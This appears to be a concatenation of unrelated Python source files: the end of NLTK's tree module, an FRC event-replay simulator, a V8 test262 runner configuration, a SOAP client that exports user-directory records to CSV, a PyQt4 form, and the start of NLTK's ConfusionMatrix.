                for (parent, index) in self._get_parent_indices()
                if index > 0]

    def right_siblings(self):
        """
        A list of all right siblings of this tree, in any of its parent
        trees.  A tree may be its own right sibling if it is used as
        multiple contiguous children of the same parent.  A tree may
        appear multiple times in this list if it is the right sibling
        of this tree with respect to multiple parents.

        :type: list(MultiParentedTree)
        """
        return [parent[index+1]
                for (parent, index) in self._get_parent_indices()
                if index < (len(parent)-1)]

    def _get_parent_indices(self):
        # Every (parent, index) pair where this tree occurs as a child,
        # matched by identity.
        return [(parent, index)
                for parent in self._parents
                for index, child in enumerate(parent)
                if child is self]

    def roots(self):
        """
        The set of all roots of this tree.  This set is formed by
        tracing all possible parent paths until trees with no parents
        are found.

        :type: list(MultiParentedTree)
        """
        return list(self._get_roots_helper({}).values())

    def _get_roots_helper(self, result):
        # Accumulate parentless ancestors into ``result``, keyed by
        # object id so each root is recorded exactly once.
        if self._parents:
            for parent in self._parents:
                parent._get_roots_helper(result)
        else:
            result[id(self)] = self
        return result

    def parent_indices(self, parent):
        """
        Return a list of the indices where this tree occurs as a child
        of ``parent``.  If this child does not occur as a child of
        ``parent``, then the empty list is returned.  The following is
        always true::

          for parent_index in ptree.parent_indices(parent):
              parent[parent_index] is ptree
        """
        if parent not in self._parents: return []
        else: return [index for (index, child) in enumerate(parent)
                      if child is self]

    def treepositions(self, root):
        """
        Return a list of all tree positions that can be used to reach
        this multi-parented tree starting from ``root``.  I.e., the
        following is always true::

          for treepos in ptree.treepositions(root):
              root[treepos] is ptree
        """
        if self is root:
            return [()]
        else:
            return [treepos+(index,)
                    for parent in self._parents
                    for treepos in parent.treepositions(root)
                    for (index, child) in enumerate(parent) if child is self]

    #/////////////////////////////////////////////////////////////////
    # Parent Management
    #/////////////////////////////////////////////////////////////////
    def _delparent(self, child, index):
        # Sanity checks
        assert isinstance(child, MultiParentedTree)
        assert self[index] is child
        assert len([p for p in child._parents if p is self]) == 1
        # If the only copy of child in self is at index, then delete
        # self from child's parent list.  (The for/else runs the else
        # clause only when no other occurrence of child was found.)
        for i, c in enumerate(self):
            if c is child and i != index: break
        else:
            child._parents.remove(self)

    def _setparent(self, child, index, dry_run=False):
        # If the child's type is incorrect, then complain.
        if not isinstance(child, MultiParentedTree):
            raise TypeError('Can not insert a non-MultiParentedTree '+
                            'into a MultiParentedTree')
        # Add self as a parent pointer if it's not already listed.
        if not dry_run:
            for parent in child._parents:
                if parent is self: break
            else:
                child._parents.append(self)
class ImmutableParentedTree(ImmutableTree, ParentedTree):
    """An immutable version of ``ParentedTree``; combines the behavior
    of its two base classes."""
    pass
class ImmutableMultiParentedTree(ImmutableTree, MultiParentedTree):
    """An immutable version of ``MultiParentedTree``; combines the
    behavior of its two base classes."""
    pass
@python_2_unicode_compatible
class ProbabilisticTree(Tree, ProbabilisticMixIn):
    """A ``Tree`` that also carries a probability, supplied via
    ``ProbabilisticMixIn``."""
    def __init__(self, node, children=None, **prob_kwargs):
        Tree.__init__(self, node, children)
        ProbabilisticMixIn.__init__(self, **prob_kwargs)

    # We have to patch up these methods to make them work right:
    def _frozen_class(self): return ImmutableProbabilisticTree
    def __repr__(self):
        return '%s (p=%r)' % (Tree.unicode_repr(self), self.prob())
    def __str__(self):
        return '%s (p=%.6g)' % (self.pformat(margin=60), self.prob())
    def copy(self, deep=False):
        if not deep: return type(self)(self._label, self, prob=self.prob())
        else: return type(self).convert(self)
    @classmethod
    def convert(cls, val):
        # Trees that carry no probability are given prob=1.0.
        if isinstance(val, Tree):
            children = [cls.convert(child) for child in val]
            if isinstance(val, ProbabilisticMixIn):
                return cls(val._label, children, prob=val.prob())
            else:
                return cls(val._label, children, prob=1.0)
        else:
            return val

    def __eq__(self, other):
        # Equality requires the exact same class, plus matching label,
        # children, and probability.
        return (self.__class__ is other.__class__ and
                (self._label, list(self), self.prob()) ==
                (other._label, list(other), other.prob()))

    def __lt__(self, other):
        if not isinstance(other, Tree):
            raise_unorderable_types("<", self, other)
        if self.__class__ is other.__class__:
            return ((self._label, list(self), self.prob()) <
                    (other._label, list(other), other.prob()))
        else:
            # Trees of different classes are ordered by class name.
            return self.__class__.__name__ < other.__class__.__name__
@python_2_unicode_compatible
class ImmutableProbabilisticTree(ImmutableTree, ProbabilisticMixIn):
    """An immutable version of ``ProbabilisticTree``."""
    def __init__(self, node, children=None, **prob_kwargs):
        ImmutableTree.__init__(self, node, children)
        ProbabilisticMixIn.__init__(self, **prob_kwargs)
        # Recompute the hash so that it also covers the probability.
        self._hash = hash((self._label, tuple(self), self.prob()))

    # We have to patch up these methods to make them work right:
    def _frozen_class(self): return ImmutableProbabilisticTree
    def __repr__(self):
        return '%s [%s]' % (Tree.unicode_repr(self), self.prob())
    def __str__(self):
        return '%s [%s]' % (self.pformat(margin=60), self.prob())
    def copy(self, deep=False):
        if not deep: return type(self)(self._label, self, prob=self.prob())
        else: return type(self).convert(self)
    @classmethod
    def convert(cls, val):
        # Trees that carry no probability are given prob=1.0.
        if isinstance(val, Tree):
            children = [cls.convert(child) for child in val]
            if isinstance(val, ProbabilisticMixIn):
                return cls(val._label, children, prob=val.prob())
            else:
                return cls(val._label, children, prob=1.0)
        else:
            return val
def _child_names(tree):
    """Return ``tree``'s children, with each subtree replaced by a
    ``Nonterminal`` wrapping its label (leaves pass through as-is)."""
    return [Nonterminal(child._label) if isinstance(child, Tree) else child
            for child in tree]
def bracket_parse(s):
    """
    Use Tree.read(s, remove_empty_top_bracketing=True) instead.
    """
    # Retired entry point: always fails, pointing callers at the
    # replacement API.
    message = "Use Tree.read(s, remove_empty_top_bracketing=True) instead."
    raise NameError(message)
def sinica_parse(s):
    """
    Parse a Sinica Treebank string and return a tree.  Trees are represented as nested brackettings,
    as shown in the following example (X represents a Chinese character):
    S(goal:NP(Head:Nep:XX)|theme:NP(Head:Nhaa:X)|quantity:Dab:X|Head:VL2:X)#0(PERIODCATEGORY)

    :return: A tree corresponding to the string representation.
    :rtype: Tree
    :param s: The string to be converted
    :type s: str
    """
    # Split on the structural characters, keeping them as tokens, then
    # rewrite the token list in place into Penn-style bracketing.
    tokens = re.split(r'([()| ])', s)
    for i, tok in enumerate(tokens):
        if tok == '(':
            # Pull the nonterminal inside the parens.
            tokens[i - 1], tokens[i] = tok, tokens[i - 1]
        elif ':' in tok:
            fields = tok.split(':')
            if len(fields) == 2: # non-terminal
                tokens[i] = fields[1]
            else:
                tokens[i] = "(" + fields[-2] + " " + fields[-1] + ")"
        elif tok == '|':
            tokens[i] = ''
    return Tree.fromstring(" ".join(tokens), remove_empty_top_bracketing=True)
def demo():
    """
    A demonstration of Tree and ProbabilisticTree: parses a bracketed
    string, inspects and modifies the tree, applies tree transforms,
    and shows several output formats. The printed sequence is the
    expected demo output — keep statement order intact.
    """
    from nltk import Tree, ProbabilisticTree
    # Demonstrate tree parsing.
    s = '(S (NP (DT the) (NN cat)) (VP (VBD ate) (NP (DT a) (NN cookie))))'
    t = Tree.fromstring(s)
    print("Convert bracketed string into tree:")
    print(t)
    print(t.__repr__())
    print("Display tree properties:")
    print(t.label())         # tree's constituent type
    print(t[0])              # tree's first child
    print(t[1])              # tree's second child
    print(t.height())
    print(t.leaves())
    print(t[1])
    print(t[1,1])            # nested indexing: second child's second child
    print(t[1,1,0])
    # Demonstrate tree modification.
    the_cat = t[0]
    the_cat.insert(1, Tree.fromstring('(JJ big)'))
    print("Tree modification:")
    print(t)
    t[1,1,1] = Tree.fromstring('(NN cake)')
    print(t)
    print()
    # Tree transforms
    print("Collapse unary:")
    t.collapse_unary()
    print(t)
    print("Chomsky normal form:")
    t.chomsky_normal_form()
    print(t)
    print()
    # Demonstrate probabilistic trees.
    pt = ProbabilisticTree('x', ['y', 'z'], prob=0.5)
    print("Probabilistic Tree:")
    print(pt)
    print()
    # Demonstrate parsing of treebank output format.
    t = Tree.fromstring(t.pformat())
    print("Convert tree to bracketed string and back again:")
    print(t)
    print()
    # Demonstrate LaTeX output
    print("LaTeX output:")
    print(t.pformat_latex_qtree())
    print()
    # Demonstrate Productions
    print("Production output:")
    print(t.productions())
    print()
    # Demonstrate tree nodes containing objects other than strings
    t.set_label(('test', 3))
    print(t)
# Public API of this module.
__all__ = ['ImmutableProbabilisticTree', 'ImmutableTree', 'ProbabilisticMixIn',
           'ProbabilisticTree', 'Tree', 'bracket_parse',
           'sinica_parse', 'ParentedTree', 'MultiParentedTree',
           'ImmutableParentedTree', 'ImmutableMultiParentedTree']
|
from collections import defaultdict
import copy
import datetime
import json
from appengine_fixture_loader.loader import load_fixture
from google.appengine.ext import ndb
from helpers.event_details_manipulator import EventDetailsManipulator
from helpers.match_helper import MatchHelper
from helpers.match_manipulator import MatchManipulator
from models.event import Event
from models.event_details import EventDetails
from models.match import Match
class EventSimulator(object):
    """
    Steps through an event in time. At step = 0, only the Event exists:
    (step 0) Add all unplayed qual matches
    (step 1, substep n) Add results of each of the n qual matches +
    rankings being updated (if has_event_details)
    (step 2) Add alliance selections (if has_event_details)
    (step 3) Add unplayed QF matches
    (step 4, substep n) Add results of each of the n QF matches +
    update SF matches with advancing alliances (if not batch_advance) +
    update alliance selection backups (if has_event_details)
    (step 5) Add unplayed SF matches (if batch_advance)
    (step 6, substep n) Add results of each of the n SF matches +
    update F matches with advancing alliances (if not batch_advance) +
    update alliance selection backups (if has_event_details)
    (step 7) Add unplayed F matches (if batch_advance)
    (step 8, substep n) Add results of each of the n F matches +
    update alliance selection backups (if has_event_details)
    """
    def __init__(self, has_event_details=True, batch_advance=False):
        # Loads the complete 2016nytr event from fixtures, snapshots its
        # matches/details in memory, then deletes the datastore entities so
        # that step() can replay the event incrementally.
        self._step = 0
        self._substep = 0
        # whether to update rankings and alliance selections
        self._has_event_details = has_event_details
        # whether to update next playoff level all at once, or as winners are determined
        self._batch_advance = batch_advance
        # Load and save complete data
        load_fixture('test_data/fixtures/2016nytr_event_team_status.json',
                     kind={'EventDetails': EventDetails, 'Event': Event, 'Match': Match},
                     post_processor=self._event_key_adder)
        event = Event.get_by_id('2016nytr')
        # Add 3rd matches that never got played
        unplayed_matches = [
            Match(
                id='2016nytr_qf1m3',
                year=2016,
                event=event.key,
                comp_level='qf',
                set_number=1,
                match_number=3,
                alliances_json=json.dumps({
                    'red': {
                        'teams': ['frc3990', 'frc359', 'frc4508'],
                        'score': -1,
                    },
                    'blue': {
                        'teams': ['frc3044', 'frc4930', 'frc4481'],
                        'score': -1,
                    }
                }),
                time=datetime.datetime(2016, 3, 19, 18, 34),
            ),
            Match(
                id='2016nytr_qf3m3',
                year=2016,
                event=event.key,
                comp_level='qf',
                set_number=3,
                match_number=3,
                alliances_json=json.dumps({
                    'red': {
                        'teams': ['frc20', 'frc5254', 'frc229'],
                        'score': -1,
                    },
                    'blue': {
                        'teams': ['frc3003', 'frc358', 'frc527'],
                        'score': -1,
                    }
                }),
                time=datetime.datetime(2016, 3, 19, 18, 48),
            ),
            Match(
                id='2016nytr_sf1m3',
                year=2016,
                event=event.key,
                comp_level='sf',
                set_number=1,
                match_number=3,
                alliances_json=json.dumps({
                    'red': {
                        'teams': ['frc3990', 'frc359', 'frc4508'],
                        'score': -1,
                    },
                    'blue': {
                        'teams': ['frc5240', 'frc3419', 'frc663'],
                        'score': -1,
                    }
                }),
                time=datetime.datetime(2016, 3, 19, 19, 42),
            )
        ]
        self._event_details = event.details
        # Pre-backup alliance list: clears alliance 1's backup so it can be
        # re-introduced mid-playoffs during step 6.
        self._alliance_selections_without_backup = copy.deepcopy(event.details.alliance_selections)
        self._alliance_selections_without_backup[1]['backup'] = None
        self._played_matches = MatchHelper.organizeMatches(event.matches)
        self._all_matches = MatchHelper.organizeMatches(event.matches + unplayed_matches)
        # Delete data
        event.details.key.delete()
        ndb.delete_multi([match.key for match in event.matches])
        ndb.get_context().clear_cache()
        # Used to keep track of non-batch advancement
        self._advancement_alliances = defaultdict(dict)
    def _event_key_adder(self, obj):
        # Fixture post-processor: attach every loaded model to the event key.
        obj.event = ndb.Key(Event, '2016nytr')
    def _update_rankings(self):
        """
        Generates and saves fake rankings
        """
        event = Event.get_by_id('2016nytr')
        team_wins = defaultdict(int)
        team_losses = defaultdict(int)
        team_ties = defaultdict(int)
        teams = set()
        for match in event.matches:
            if match.comp_level == 'qm':
                for alliance in ['red', 'blue']:
                    for team in match.alliances[alliance]['teams']:
                        teams.add(team)
                        if match.has_been_played:
                            if alliance == match.winning_alliance:
                                team_wins[team] += 1
                            elif match.winning_alliance == '':
                                team_ties[team] += 1
                            else:
                                team_losses[team] += 1
        rankings = []
        for team in sorted(teams):
            wins = team_wins[team]
            losses = team_losses[team]
            ties = team_ties[team]
            rankings.append({
                'team_key': team,
                'record': {
                    'wins': wins,
                    'losses': losses,
                    'ties': ties,
                },
                'matches_played': wins + losses + ties,
                'dq': 0,
                # Ranking points: 2 per win, 1 per tie (remaining sort
                # orders are zeroed for this fake data).
                'sort_orders': [2 * wins + ties, 0, 0, 0, 0],
                'qual_average': None,
            })
        rankings = sorted(rankings, key=lambda r: -r['sort_orders'][0])
        for i, ranking in enumerate(rankings):
            ranking['rank'] = i + 1
        EventDetailsManipulator.createOrUpdate(EventDetails(
            id='2016nytr',
            rankings2=rankings,
        ))
    def step(self):
        """Advance the simulated event by one (step, substep) increment;
        see the class docstring for what each step number means."""
        event = Event.get_by_id('2016nytr')
        if self._step == 0:  # Qual match schedule added
            for match in copy.deepcopy(self._all_matches['qm']):
                for alliance in ['red', 'blue']:
                    match.alliances[alliance]['score'] = -1
                match.alliances_json = json.dumps(match.alliances)
                match.score_breakdown_json = None
                match.actual_time = None
                MatchManipulator.createOrUpdate(match)
            self._step += 1
        elif self._step == 1:  # After each qual match
            MatchManipulator.createOrUpdate(self._played_matches['qm'][self._substep])
            if self._substep < len(self._played_matches['qm']) - 1:
                self._substep += 1
            else:
                self._step += 1
                self._substep = 0
            EventDetailsManipulator.createOrUpdate(EventDetails(id='2016nytr'))
        elif self._step == 2:  # After alliance selections
            EventDetailsManipulator.createOrUpdate(EventDetails(
                id='2016nytr',
                alliance_selections=self._alliance_selections_without_backup
            ))
            self._step += 1
        elif self._step == 3:  # QF schedule added
            for match in copy.deepcopy(self._all_matches['qf']):
                for alliance in ['red', 'blue']:
                    match.alliances[alliance]['score'] = -1
                match.alliances_json = json.dumps(match.alliances)
                match.score_breakdown_json = None
                match.actual_time = None
                MatchManipulator.createOrUpdate(match)
            self._step += 1
        elif self._step == 4:  # After each QF match
            new_match = MatchHelper.play_order_sort_matches(self._played_matches['qf'])[self._substep]
            MatchManipulator.createOrUpdate(new_match)
            if not self._batch_advance:
                # Count wins in this best-of-3 set so far; a second win
                # advances the alliance into the appropriate SF slot.
                win_counts = {
                    'red': 0,
                    'blue': 0,
                }
                for i in xrange(new_match.match_number):
                    win_counts[Match.get_by_id(
                        Match.renderKeyName(
                            new_match.event.id(),
                            new_match.comp_level,
                            new_match.set_number,
                            i+1)).winning_alliance] += 1
                for alliance, wins in win_counts.items():
                    if wins == 2:
                        s = new_match.set_number
                        if s in {1, 2}:
                            self._advancement_alliances['sf1']['red' if s == 1 else 'blue'] = new_match.alliances[alliance]['teams']
                        elif s in {3, 4}:
                            self._advancement_alliances['sf2']['red' if s == 3 else 'blue'] = new_match.alliances[alliance]['teams']
                        else:
                            raise Exception("Invalid set number: {}".format(s))
                # Write out (or refresh) the SF schedule with whatever
                # advancing alliances are known so far.
                for match_set, alliances in self._advancement_alliances.items():
                    if match_set.startswith('sf'):
                        for i in xrange(3):
                            for match in copy.deepcopy(self._all_matches['sf']):
                                key = '2016nytr_{}m{}'.format(match_set, i+1)
                                if match.key.id() == key:
                                    for color in ['red', 'blue']:
                                        match.alliances[color]['score'] = -1
                                        match.alliances[color]['teams'] = alliances.get(color, [])
                                    match.alliances_json = json.dumps(match.alliances)
                                    match.score_breakdown_json = None
                                    match.actual_time = None
                                    MatchManipulator.createOrUpdate(match)
            if self._substep < len(self._played_matches['qf']) - 1:
                self._substep += 1
            else:
                # +1 goes to the schedule step when batch advancing;
                # otherwise the schedule was written above, so skip it (+2).
                self._step += 1 if self._batch_advance else 2
                self._substep = 0
        elif self._step == 5:  # SF schedule added
            if self._batch_advance:
                for match in copy.deepcopy(self._all_matches['sf']):
                    for alliance in ['red', 'blue']:
                        match.alliances[alliance]['score'] = -1
                    match.alliances_json = json.dumps(match.alliances)
                    match.score_breakdown_json = None
                    match.actual_time = None
                    MatchManipulator.createOrUpdate(match)
                self._step += 1
        elif self._step == 6:  # After each SF match
            new_match = MatchHelper.play_order_sort_matches(self._played_matches['sf'])[self._substep]
            MatchManipulator.createOrUpdate(new_match)
            if not self._batch_advance:
                win_counts = {
                    'red': 0,
                    'blue': 0,
                }
                for i in xrange(new_match.match_number):
                    win_counts[Match.get_by_id(
                        Match.renderKeyName(
                            new_match.event.id(),
                            new_match.comp_level,
                            new_match.set_number,
                            i+1)).winning_alliance] += 1
                for alliance, wins in win_counts.items():
                    if wins == 2:
                        self._advancement_alliances['f1']['red' if new_match.set_number == 1 else 'blue'] = new_match.alliances[alliance]['teams']
                for match_set, alliances in self._advancement_alliances.items():
                    if match_set.startswith('f'):
                        for i in xrange(3):
                            for match in copy.deepcopy(self._all_matches['f']):
                                key = '2016nytr_{}m{}'.format(match_set, i+1)
                                if match.key.id() == key:
                                    for color in ['red', 'blue']:
                                        match.alliances[color]['score'] = -1
                                        match.alliances[color]['teams'] = alliances.get(color, [])
                                    match.alliances_json = json.dumps(match.alliances)
                                    match.score_breakdown_json = None
                                    match.actual_time = None
                                    MatchManipulator.createOrUpdate(match)
            # Backup robot introduced
            if self._substep == 3:
                EventDetailsManipulator.createOrUpdate(EventDetails(
                    id='2016nytr',
                    alliance_selections=self._event_details.alliance_selections
                ))
            if self._substep < len(self._played_matches['sf']) - 1:
                self._substep += 1
            else:
                self._step += 1 if self._batch_advance else 2
                self._substep = 0
        elif self._step == 7:  # F schedule added
            if self._batch_advance:
                for match in copy.deepcopy(self._all_matches['f']):
                    for alliance in ['red', 'blue']:
                        match.alliances[alliance]['score'] = -1
                    match.alliances_json = json.dumps(match.alliances)
                    match.score_breakdown_json = None
                    match.actual_time = None
                    MatchManipulator.createOrUpdate(match)
                self._step += 1
        elif self._step == 8:  # After each F match
            MatchManipulator.createOrUpdate(
                MatchHelper.play_order_sort_matches(
                    self._played_matches['f'])[self._substep])
            if self._substep < len(self._played_matches['f']) - 1:
                self._substep += 1
            else:
                self._step += 1
                self._substep = 0
        ndb.get_context().clear_cache()
        # Re fetch event matches
        event = Event.get_by_id('2016nytr')
        MatchHelper.deleteInvalidMatches(event.matches)
        ndb.get_context().clear_cache()
        self._update_rankings()
|
import test
import os
from os.path import join, exists
# Harness files (in order) prepended to every test262 test invocation.
TEST_262_HARNESS = ['sta.js']
class Test262TestCase(test.TestCase):
  """A single test262 conformance test, executed through the harness files."""
  def __init__(self, filename, path, context, root, mode, framework):
    super(Test262TestCase, self).__init__(context, path, mode)
    self.filename = filename
    self.framework = framework
    self.root = root
  def IsNegative(self):
    # Tests annotated with @negative in their source are expected to fail.
    return '@negative' in self.GetSource()
  def GetLabel(self):
    return "%s test262 %s" % (self.mode, self.GetName())
  def IsFailureOutput(self, output):
    if output.exit_code != 0:
      return True
    return 'FAILED!' in output.stdout
  def GetCommand(self):
    # VM command line: vm flags + harness files + the test file itself.
    result = self.context.GetVmCommand(self, self.mode)
    result += self.framework
    result.append(self.filename)
    return result
  def GetName(self):
    return self.path[-1]
  def GetSource(self):
    # Use a context manager so the handle is closed deterministically
    # (the original open(...).read() leaked it until GC).
    with open(self.filename) as f:
      return f.read()
class Test262TestConfiguration(test.TestConfiguration):
  """Discovers test262 suite files and builds Test262TestCase objects."""
  def __init__(self, context, root):
    super(Test262TestConfiguration, self).__init__(context, root)
  def ListTests(self, current_path, path, mode, variant_flags):
    testroot = join(self.root, 'data', 'test', 'suite')
    harness = [join(self.root, 'data', 'test', 'harness', f)
               for f in TEST_262_HARNESS]
    harness += [join(self.root, 'harness-adapt.js')]
    tests = []
    for root, dirs, files in os.walk(testroot):
      # Skip hidden directories; sort for a deterministic test order.
      for dotted in [x for x in dirs if x.startswith('.')]:
        dirs.remove(dotted)
      dirs.sort()
      root_path = root[len(self.root):].split(os.path.sep)
      root_path = current_path + [x for x in root_path if x]
      files.sort()
      # 'fname'/'case' avoid shadowing the 'file' builtin and the imported
      # 'test' module (which the original locals did).
      for fname in files:
        if fname.endswith('.js'):
          test_path = ['test262', fname[:-3]]
          if self.Contains(path, test_path):
            case = Test262TestCase(join(root, fname), test_path, self.context,
                                   self.root, mode, harness)
            tests.append(case)
    return tests
  def GetBuildRequirements(self):
    return ['d8']
  def GetTestStatus(self, sections, defs):
    # Merge expectations from test262.status when present.
    status_file = join(self.root, 'test262.status')
    if exists(status_file):
      test.ReadConfigurationInto(status_file, sections, defs)
def GetConfiguration(context, root):
  # Factory hook invoked by the test-runner framework.
  return Test262TestConfiguration(context, root)
|
"""
IAMService
"""
import time
import xml.sax.saxutils as saxutils
import sys, httplib
from lxml import etree
from cStringIO import StringIO
import toml
class IAMClient(object):
    # NOTE(review): Python 2 only (httplib and the print statement below).
    def __init__(self):
        # Connection settings (host, admin credentials, nonce) come from
        # config.toml next to the script.
        conf_fn = "config.toml"
        with open(conf_fn) as conf_fh:
            self.conf = toml.loads(conf_fh.read())
        print(self.conf)
    def searchAll(self, startPage, pageSize ):
        """Invoke the searchAll SOAP operation with WS-Security username
        token auth; returns the raw XML response body as a string."""
        #config = static.ERP_CONFIG #'SL 8.0'
        query = {"username":self.conf["Admin"],"password":self.conf["Admin_Password"], "nonce":self.conf["Nonce"], "startPage":startPage, "pageSize": pageSize}
        SM_TEMPLATE = r"""<?xml version="1.0" encoding="UTF-8"?>
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:sear="http://search.service.iam.foton.com/">
    <soapenv:Header>
    <wsse:Security soapenv:mustUnderstand="1" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
    <wsse:UsernameToken wsu:Id="UsernameToken-1" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">
    <wsse:Username>%(username)s</wsse:Username>
    <wsse:Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordText">%(password)s</wsse:Password>
    <wsse:Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">%(nonce)s</wsse:Nonce>
    <wsu:Created>2012-07-06T01:49:02.953Z</wsu:Created>
    </wsse:UsernameToken>
    </wsse:Security>
    </soapenv:Header>
    <soapenv:Body>
    <sear:searchAll>
    <arg0>%(startPage)s</arg0>
    <arg1>%(pageSize)s</arg1>
    <!--Optional:-->
    <arg2>ou</arg2>
    <arg3>true</arg3>
    </sear:searchAll>
    </soapenv:Body>
    </soapenv:Envelope>""" % query
        SoapMessage = SM_TEMPLATE
        #print SoapMessage
        #construct and send the header
        host =self.conf["HOST"]
        print(host)
        # httplib.HTTP is the legacy Python 2 API; headers are written
        # manually before sending the SOAP body.
        webservice = httplib.HTTP(host)
        service = self.conf["Service2"]
        url = "/IAMService/services/soap/%s" %(service)
        webservice.putrequest("POST", url)
        webservice.putheader("Host", host)
        webservice.putheader("User-Agent", "Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322)")
        webservice.putheader("Content-type", "text/xml; charset=\"UTF-8\"")
        webservice.putheader("Accept-Language", "en-us")
        webservice.putheader("Content-length", "%d" % len(SoapMessage))
        #webservice.putheader("SOAPAction", "authenticate")
        webservice.endheaders()
        webservice.send(SoapMessage)
        # get the response
        statuscode, statusmessage, header = webservice.getreply()
        print "Response: ", statuscode, statusmessage, startPage
        #print "headers: ", header
        #print dir(webservice)
        res = webservice.getfile().read()
        fn = "%d.xml" %(time.time())
        #print res
        #with open(fn, 'w') as fh:
        #    fh.write(res)
        return res #self.parseSessionToken(res)
    def getResponse(self, xmlstr):
        """Strip the 'soap:' namespace prefix and return the text of the
        second child of the first element under /Envelope/Body."""
        string_file = StringIO(xmlstr.replace('soap:',''))
        #root = etree.fromstring(xml)
        tree = etree.parse(string_file)
        resp = None
        for element in tree.xpath('/Envelope/Body'):
            resp = element[0][1].text
        return resp
    def getResult(self, xmlstr):
        """Return "S" when the response's last /Parameters entry reports
        'successful', otherwise "F"."""
        resp = self.getResponse(xmlstr)
        string_file = StringIO(resp)
        #root = etree.fromstring(xml)
        tree = etree.parse(string_file)
        result = None
        v = tree.xpath('/Parameters')[0]
        l = len(v)
        result = v[l-1].text
        if result.count('successful') >0:
            return "S"
        else:
            return "F"
def get_element_text(element, node):
    """Return the UTF-8 encoded text of the first *node* matched under
    *element*, or an empty string when the XPath query has no match."""
    matches = element.xpath(node)
    if not matches:
        return ""
    return matches[0].text.encode("utf8")
def main():
    """Page through the IAM directory (pages 1-19, 10 users each) and dump
    selected user attributes to id3.csv, one comma-separated line per user."""
    cm = IAMClient()
    # The context manager guarantees the CSV is flushed and closed even if
    # a request or parse step raises (the original used bare open/close).
    with open("id3.csv","w") as fh:
        for i in range(1, 20):
            xmlstr = cm.searchAll(i,10)
            # Strip namespace prefixes so plain XPath expressions match.
            string_file = StringIO(xmlstr.replace('soap:','').replace("ns2:",""))
            tree = etree.parse(string_file)
            for element in tree.xpath('/Envelope/Body/searchAllResponse/return/userData'):
                v1 = get_element_text(element, "cn")
                v2 = get_element_text(element, "mail")
                v3 = get_element_text(element, "fotonAppAtt37")
                v4 = get_element_text(element, "mobile")
                v5 = get_element_text(element, "telephoneNumber")
                v6 = get_element_text(element, "uid")
                v7 = get_element_text(element, "ou")
                x = "%s,%s,%s,%s,%s,%s,%s\n" % (v1, v2, v3, v4, v5, v6, v7)
                fh.write(x)
            # Throttle requests so the service is not hammered.
            time.sleep(0.5)
# Script entry point.
if __name__ == '__main__':
    main()
|
from __future__ import print_function
from PyQt4 import QtCore, QtGui
# pyuic-style compatibility shims: fall back to identity/plain-translate
# helpers when this PyQt4 build lacks QString.fromUtf8 / UnicodeUTF8.
try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    def _fromUtf8(s):
        return s
try:
    _encoding = QtGui.QApplication.UnicodeUTF8
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig)
class Ui_Form(object):
    # Auto-generated (pyuic4-style) layout: a bold-titled group box holding
    # three checkboxes for trace record/display options. Avoid hand-editing
    # beyond comments; regenerate from the .ui file instead.
    def setupUi(self, Form):
        # Build the widget tree and apply fonts/default check states.
        Form.setObjectName(_fromUtf8("Form"))
        Form.resize(427, 220)
        self.verticalLayout = QtGui.QVBoxLayout(Form)
        self.verticalLayout.setSpacing(0)
        self.verticalLayout.setMargin(0)
        self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
        # GroupBox is the custom widget imported at the bottom of the module
        # (deferred import, pyuic convention).
        self.groupBox = GroupBox(Form)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.groupBox.setFont(font)
        self.groupBox.setCheckable(False)
        self.groupBox.setObjectName(_fromUtf8("groupBox"))
        self.gridLayout = QtGui.QGridLayout(self.groupBox)
        self.gridLayout.setSpacing(0)
        self.gridLayout.setContentsMargins(5, 0, 0, 0)
        self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
        # Child checkboxes get a normal-weight font (the group title is bold).
        self.recordCheck = QtGui.QCheckBox(self.groupBox)
        font = QtGui.QFont()
        font.setBold(False)
        font.setWeight(50)
        self.recordCheck.setFont(font)
        self.recordCheck.setChecked(True)
        self.recordCheck.setObjectName(_fromUtf8("recordCheck"))
        self.gridLayout.addWidget(self.recordCheck, 0, 0, 1, 1)
        self.displayCheck = QtGui.QCheckBox(self.groupBox)
        font = QtGui.QFont()
        font.setBold(False)
        font.setWeight(50)
        self.displayCheck.setFont(font)
        self.displayCheck.setChecked(True)
        self.displayCheck.setObjectName(_fromUtf8("displayCheck"))
        self.gridLayout.addWidget(self.displayCheck, 0, 1, 1, 1)
        self.recordInitCheck = QtGui.QCheckBox(self.groupBox)
        font = QtGui.QFont()
        font.setBold(False)
        font.setWeight(50)
        self.recordInitCheck.setFont(font)
        self.recordInitCheck.setObjectName(_fromUtf8("recordInitCheck"))
        self.gridLayout.addWidget(self.recordInitCheck, 1, 0, 1, 2)
        # Spacer pushes the checkboxes to the top of the group box.
        spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
        self.gridLayout.addItem(spacerItem, 2, 0, 1, 1)
        self.verticalLayout.addWidget(self.groupBox)
        self.retranslateUi(Form)
        QtCore.QMetaObject.connectSlotsByName(Form)
    def retranslateUi(self, Form):
        # Apply translatable UI strings.
        Form.setWindowTitle(_translate("Form", "Form", None))
        self.groupBox.setTitle(_translate("Form", "GroupBox", None))
        self.recordCheck.setText(_translate("Form", "Record Trace", None))
        self.displayCheck.setText(_translate("Form", "Display", None))
        self.recordInitCheck.setText(_translate("Form", "Record Initial State", None))
from acq4.pyqtgraph import GroupBox
|
from __future__ import print_function, unicode_literals
from nltk.probability import FreqDist
from nltk.compat import python_2_unicode_compatible
@python_2_unicode_compatible
class ConfusionMatrix(object):
    """
    The confusion matrix between a list of reference values and a
    corresponding list of test values. Entry *[r,t]* of this
    matrix is a count of the number of times that the reference value
    *r* corresponds to the test value *t*. E.g.:
    >>> from nltk.metrics import ConfusionMatrix
